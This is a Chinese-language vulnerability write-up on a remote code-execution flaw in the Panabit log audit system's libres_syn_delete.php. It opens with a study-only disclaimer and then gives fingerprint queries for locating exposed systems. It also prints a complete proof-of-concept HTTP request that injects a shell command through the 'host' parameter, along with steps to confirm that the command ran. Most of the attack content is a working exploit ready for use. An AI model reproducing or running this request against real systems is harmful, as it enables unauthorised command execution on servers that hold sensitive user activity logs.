亲爱的读者,我们诚挚地提醒您,本技术文章仅供个人研究学习参考。任何因传播或利用本文章提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。感谢您的理解与支持!
Panabit日志审计系统是一款专门设计用来收集并处理用户所有网络活动的日志数据,包括会话数据、事件数据和身份数据。该系统不仅将大数据采集、大数据分析以及大数据整合应用于公安、高校、政企等行业的日志留存中,还支持对用户上网行为进行审计。
该系统 libres_syn_delete.php 文件存在代码执行漏洞,可以执行任意代码
影响版本
影响版本: <= MARS r10p1Free 影响范围:1.2w-1.4w
访问:/cretime.txt 文件可查看版本.
body="对不起,您的日志系统时间和您的流控系统时间相差超过30分钟,请核对!"
body="Maintain/cloud_index.php"
body="js/pad-zeropadding.js" && category="日志分析与审计"
其余语法自寻研究
漏洞POC
POST /content-apply/libres_syn_delete.php HTTP/1.1
Host: ***.***.***.***:****
Cache-Control: max-age=0
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 110
token=10&id=10&host=;echo id >123.txt
回显{“yn”:“yes”,“str”:“OK”},则表示代码执行成功
测试执行id命令并且输出到当前路径下的123.txt文件中
查看生成的txt文件,发现执行的命令回显内容成功写入